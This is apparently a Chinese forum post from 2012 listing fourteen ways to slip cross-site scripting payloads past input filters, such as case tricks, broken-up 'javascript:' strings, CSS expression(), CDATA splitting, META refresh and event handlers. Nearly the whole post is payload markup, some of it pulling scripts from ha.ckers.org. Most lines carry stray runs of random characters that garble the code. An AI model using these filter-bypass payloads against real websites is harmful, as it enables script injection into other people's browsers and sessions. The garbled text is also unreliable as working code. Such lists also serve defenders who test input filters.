1. 改变字符大小写
" g4 t) x3 s+ @% R5 @% _9 C8 G- A
' d" t/ F& M8 {( h
1 e( M( O Y, [, k1 Y6 G
* a; ?7 j1 Y5 b7 w( W( w9 a <sCript>alert(‘d’)</scRipT>
8 D: ^1 F y! ]9 j* O' f) S: F. Y' A& t* {- n
2. 利用多加一些其它字符来规避Regular Expression的检查& Q/ m( \. o ?# W' e* T
4 o3 C( Z6 O, n/ X/ Y
<<script>alert(‘c’)//<</script>
- o( o3 f/ a( d4 \/ l- T: R# }' u0 h4 n3 S! j1 L8 ^
<SCRIPT a=">" SRC="t.js"></SCRIPT>
7 b7 D4 k: {, u" a5 F! x! |, K# I& d$ v# W/ _* u$ e# o9 x3 J( @! o
<SCRIPT =">" SRC="t.js"></SCRIPT>3 w4 o( {2 P9 ~4 }9 ]5 G
6 \6 F) o2 b( Y: \. a, i+ ^ <SCRIPT a=">" ” SRC="t.js"></SCRIPT> ]3 s# O; b4 w+ L
3 K4 L! [! u% L6 u0 S <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
9 y; r" {. ?7 p4 Q7 g; C; o$ ?" E u. J; {1 \
<SCRIPT a=`>` SRC="t.js"></SCRIPT>$ F5 z. m! Z- _$ `. k: |$ j# z( r
5 ?# Y4 N4 h/ L+ }" l6 x5 q
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>( a1 t- o" ?/ t3 W8 v+ K
: J# U9 E8 ?% M" r5 `
3. 以其它扩展名取代.js7 [) m) [) `/ ^
& k- M2 [/ ]" E9 n8 U; y <script src="bad.jpg"></script>
, c- p: n9 W t
6 _) @3 F7 |) C- L1 K+ f4. 将Javascript写在CSS档里
7 }3 f& S4 m6 H0 e# C% m/ ^
- |+ j# q' _" w. }" G <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
6 d/ u( P" }& i' {" X( L/ X6 A% h0 x% u Q2 S T3 x
example:
- A f' V/ J8 v7 D9 ]$ H; w+ ?/ W- h5 C
body {1 j/ B: t8 {& I: ~0 ~" M
% r) ^2 R- W1 x* C9 h! r6 x background-image: url(‘javascript:alert("XSS");’)- G- ^6 `& l1 w6 N
( @! z" A: O( a }$ m2 _7 _' b p: C+ Y
' A# x4 V* A3 S V+ s
5. 在script的tag里加入一些其它字符' m' \/ V+ B( C( C' U) _. u
& o( F2 ^2 ?& j <SCRIPT/SRC="t.js"></SCRIPT>
) F+ }+ {" S/ _, q# D0 j
$ V- a Z8 G2 }/ H$ L3 `& k <SCRIPT/anyword SRC="t.js"></SCRIPT> {6 @7 t r2 D$ I7 b" }% Q
3 p0 T3 I0 e" f& V1 i
6. 使用tab或是new line来规避+ g* ?& k- } l+ x/ |
1 M6 `5 o3 F6 P1 b! L' D. n+ w
<img src="jav ascr ipt:alert(‘XSS3′)">
5 C9 f" e5 O2 ^4 Q' K9 H5 h8 A7 c
: Z0 z) y9 u* s9 X. ]- z t <img src="jav ascr ipt:alert(‘XSS3′)">
8 ?( ?1 F+ t/ V% J% b
- e' ?: D4 s& w/ a0 F: f$ ^3 q <IMG SRC="jav ascript:alert(‘XSS’);">
3 R- g. ^4 o c
9 j, W; D; K# b( e' } -> tag6 T5 `$ n) w1 p5 b, \/ Z# V+ o A( q
7 c, Z# |$ S, K$ n" q -> new line0 v" o8 i3 ?# e6 O% K
# j' F0 c9 `6 Z. a7. 使用"\"来规避
1 O6 r' l3 \+ B2 J b& L
: o' T: z! A0 J( V <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>8 V+ z2 z8 W& _; j7 b$ D
0 E) M" }6 h! W0 C6 z7 i, P
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>1 D, ^5 i9 g) |' g4 G' u/ P
/ u; d7 K( F/ W* W: Z# |; i <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">1 Q& I5 d1 Y ~7 G3 c8 T6 {
6 n, V/ o+ b) |' {( O; a8 S <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">3 s. m7 C8 c7 M0 Z9 _7 n3 Q8 y) v
. X% |9 |. E9 P$ x <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
% V+ r; ^4 G! B9 A0 M$ A" h6 c c$ K) ?9 L0 x8 O1 t9 H, y
8. 使用Hex encode来规避(也可能会把";"拿掉)
& P% A0 H; C2 d0 ^# m5 H( ?! d, ?9 Q. V7 s) A4 r- u+ {
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
2 t7 }8 x# p: R; t) s4 Z' w0 F
# H9 b$ J& v+ w y 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
! G1 y7 H: T! t$ s! J, E% v# \6 k# `% X" Q+ Z0 `
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">3 Q7 Z( A/ h) f9 b6 Y
1 l- q: ~. ]7 d( L
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
6 n# W, @# y" [7 k! `: E9 T# m: }+ L- c6 ?! ]2 e/ G' ^7 C
9. script in HTML tag+ I# J7 m, _1 L; b, E& ~5 C. Z
9 w5 r6 V7 N9 @. N. N <body onload=」alert(‘onload’)」>( V1 E) X! T7 z1 y4 I9 V6 ~# Q0 k
) B5 p8 R8 {$ X" I) j onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload+ k' m. `/ q" ?, C. O. K" f
$ B% w. K: N, x/ M u$ m
10. 在swf里含有xss的code8 P5 A; y% f% t! ?/ _
( l, F2 y* d( ~( w
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
0 x9 h2 @% a9 [* [8 [' d$ Y g# w1 y; \3 S* i: n
11. 利用CDATA将xss的code拆开,再组合起来。% R! M$ b) h. Y
7 p9 r) j; Y. k <XML ID=I><X><C>! {+ z+ \' w: b' i g) E/ ]
4 w/ }; _' Y" ^) c
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>( O: b6 s- Y" y! U
2 l( |# f% p3 j# c
</C></X>
: a* M+ P+ U3 @* K3 a: K2 i5 D( q) b% L, c! ]) ~
</xml>$ g$ O9 s; f* o7 S( @" G
7 o. p2 H+ z. E$ w <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>) J( E/ ~* {$ L( v: [& M: X
; E; t: Q% @5 P% P/ M6 G! c
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>( i1 P9 g% r2 L0 O! N! O8 z
" j: x% X1 h3 T- v. Z' Z) d
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
% H) |8 H& [! t7 a. V7 E. Q+ y, Y5 L! A' T2 d7 L9 O; a
12. 利用HTML+TIME。
+ _: ?( g* L: M# K
# t9 e) L6 {- ~7 C. N4 m$ K <HTML><BODY>; e& A6 Z3 j3 J9 U3 O" Y1 X& {
; M- H! v9 }, Y
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
6 a# e- B' U6 o
% W ^: q' R( l4 F2 O/ K1 X <?import namespace="t" implementation="#default#time2">* e T" T2 C4 ?/ l( N' Q
1 B6 E" F& c7 T" n. b
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">4 N0 ?5 Z' H8 K& Z6 E
" k5 f4 n+ I' H" N* ]
</BODY></HTML>4 N& i, _/ ?; K: z5 U% @* a
. J0 a" e2 I5 s
13. 透过META写入Cookie。
# o: c' d6 O( ]9 Y# @
( T# {" d; N- N* E* @( q0 V <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">, q$ R2 G" D+ W# p; Q4 h" h
, l1 i) Y# z' T' n, k" j! O
14. javascript in src , href , url& N' O% g+ z7 _# ~
# [# f4 j) W! d( X% z( H3 f. A
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
. q& \. t* L- q) j1 Y
0 c1 ~5 ^; q/ b. s3 U <img src="javascript:alert(‘XSS3′)">5 F- G4 y; w$ R+ E" w
8 v, f0 a4 A( N$ P6 |+ b
<IMG DYNSRC="javascript:alert(‘XSS20′)">
( u5 [7 T* H/ Z0 m
% X2 h2 b. ]7 h1 x4 E; m <IMG LOWSRC="javascript:alert(‘XSS21′)"># ?0 n& o$ L- g
. }6 Q. A, O: A
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">. I b8 b% O; q2 o+ ?% t* Z" P
9 K) Q0 Y- m% v/ A <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
/ B0 p9 r% K7 T8 s( i+ L2 f: \( V- D9 R2 }* I6 o
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
# p2 C! d4 Q; ~0 K" }; e, Y2 \$ M6 M. P8 ^- r( j, H
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
# k( {0 m9 M* ]4 g1 r# I8 W( u: c0 @ t
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}! f3 [' P9 {8 K8 y9 J1 S
M' X+ H) l( S& Z5 Q </STYLE><A CLASS=XSS></A>" b/ _) D- H1 W
# R5 x8 [. f: O( n! P
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>& \3 k7 k: r# U" M
. N( Q7 c6 ?4 G+ e
|
发表于 2012-12-31 09:59:28
收藏
支持
反对